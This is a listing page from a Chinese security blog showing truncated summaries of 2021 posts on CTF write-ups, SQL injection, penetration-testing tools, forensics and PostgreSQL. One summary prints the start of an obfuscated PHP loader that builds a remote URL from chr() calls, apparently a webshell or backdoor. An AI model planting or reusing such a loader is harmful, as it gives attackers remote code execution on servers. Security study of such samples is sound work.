摘要:
题目名称:web 题目类型:web 考点:sqlite数据库注入 解题思路 1、目录遍历 目录遍历发现有admin.php login.php 两个登录框都进行注入点测试发现login.php有sql注入漏洞, 查看网页源代码发现?debug 尝试访问,发现登录页面php源码 <?php ob_st 阅读全文
posted @ 2021-10-14 15:56
renblog
阅读(1016)
评论(0)
推荐(0)
摘要:
题目 链接: https://pan.baidu.com/s/1Ok1k3oxjIIydiUvYAuKydg 提取码: mhm9 复制这段内容后打开百度网盘手机App,操作更方便哦 解题思路 1、附件下载是一个base.exe,运行如下图: 2、扔到IDA,F5查看伪代码如下 (1)对主函数进行分析 阅读全文
posted @ 2021-09-28 15:48
renblog
阅读(711)
评论(0)
推荐(0)
摘要:
影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core 阅读全文
posted @ 2021-09-22 14:32
renblog
阅读(250)
评论(0)
推荐(0)
摘要:
<?php $password='lshh';$b="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(5 阅读全文
posted @ 2021-09-09 10:33
renblog
阅读(371)
评论(1)
推荐(1)
摘要:
关于Swagger-UI下的渗透实战 阅读全文
posted @ 2021-08-30 10:44
renblog
阅读(883)
评论(0)
推荐(0)
摘要:
题目 题目名称:键盘流量 题目类型:MISC 解题思路 题目下载解压发现是55.pcapng、miwen.txt两个文件 miwen.txt miwen.txt内容为base64编码假flag,文件大小与实际内容不符,发现txt隐写了零宽字符 如何发现零宽字符,vim打开文件,如下图: python 阅读全文
posted @ 2021-08-24 17:21
renblog
阅读(9074)
评论(1)
推荐(0)
摘要:
工具介绍 随着WEB前端打包工具的流行,您在日常渗透测试、安全服务中是否遇到越来越多以Webpack打包器为代表的网站?这类打包器会将整站的API和API参数打包在一起供Web集中调用,这也便于我们快速发现网站的功能和API清单,但往往这些打包器所生成的JS文件数量异常之多并且总JS代码量异常庞大( 阅读全文
posted @ 2021-08-09 13:37
renblog
阅读(7388)
评论(0)
推荐(0)
摘要:
工具介绍 FireKylin中文名称叫:火麒麟,其实跟某氪金游戏火麒麟并没有关系,作为国产的网络安全工具名称取自中国神兽:麒麟。寓意是希望能够为守护中国网络安全作出一份贡献。 其功能是收集操作系统各项痕迹,支持Windows和Linux痕迹收集。 其作用是为分析研判安全事件提供操作系统数据。 其目的 阅读全文
posted @ 2021-08-09 11:26
renblog
阅读(915)
评论(0)
推荐(1)
摘要:
postgreSQL简介 postgreSQL数据库介绍 数据库端口5432 数据库连接成功常用数据库查询命令 命令行客户端操作pg数据库常用操作 1.链接数据库 $psql -U user_name -d database_name -h serverhost 2.命令常用操作 \h #查看所有的 阅读全文
posted @ 2021-07-20 15:35
renblog
阅读(4643)
评论(0)
推荐(0)
摘要:
介绍 Viper(炫彩蛇)是什么 docker 安装 Viper(炫彩蛇)是什么 渗透实战 msf代理 配置socks代理即可 持久化 阅读全文
posted @ 2021-06-21 10:19
renblog
阅读(1622)
评论(4)
推荐(0)
浙公网安备 33010602011771号